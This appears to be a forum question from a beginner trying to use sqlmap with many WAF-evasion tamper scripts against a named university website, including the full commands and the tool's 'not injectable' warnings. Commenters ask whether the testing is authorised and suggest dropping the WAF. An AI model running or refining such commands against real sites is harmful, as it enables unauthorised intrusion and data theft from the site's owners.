1

I'm starting with sqlmap and I have the following problem: When I try to use sqlmap (trying to bypass waf) using this snippet:

sqlmap.py -u "http://prefing.umsa.edu.bo/index.php?option=com_newsfeeds&view=newsfeed&id=1&feedid=1&Itemid=18" --dbs --dbms=mysql --time-sec=10 --hex --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

or this one:

sqlmap.py -u "http://prefing.umsa.edu.bo/index.php?view=article&catid=35:pagina-principal&id=44:inicio-central&format=pdf" --dbs --dbms=mysql --time-sec=10 --hex --string --regexp --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

I saw that in the console appears:

[WARNING] heuristic (basic) test shows that GET parameter 'option' might not be injectable 
[WARNING] heuristic (basic) test shows that GET parameter 'view' might not be injectable

Also tried to find a URL inside my site similar to: http://www.cafe53rd.com/menu.php?item_id=3 because I checked that this kind of url its easiest to access but I cant find it for the site I'm auditing.

What would be the right code to make it in the following Site ("http://prefing...")

SilverlightFox
  • 33,408
  • 6
  • 67
  • 178
Alan Alvarez
  • 111
  • 2
  • 1
    I can't understand what you are asking. You need help finding URLs of a certain format? – mcgyver5 Jul 17 '15 at 21:10
  • 2
    If you are just starting with SQL Map, don't start with trying to bypass a WAF, start simple. Disable the WAF for your audit. – mcgyver5 Jul 17 '15 at 21:13
  • 1
    first up, are you authorised to test the security of this system? If not, you shouldn't be running SQLmap against it. If you are, then I would recommend testing without the WAF in place. – Rory McCune Jul 18 '15 at 15:09
  • Ok I'll tell the teacher to disable the WAF. Yes, my problem is finding vulnerable URLs recently found one that contains the terms: /pre/login/login2.do?id_rol=pst0 I found it using Vega software but now on the sqlmap console I get: "id_rol = pst0" is not injectable. What can I do? PS: This is part of a teams test that why I can´t have so much help by my teacher. Thanks – Alan Alvarez Jul 20 '15 at 10:28

0 Answers0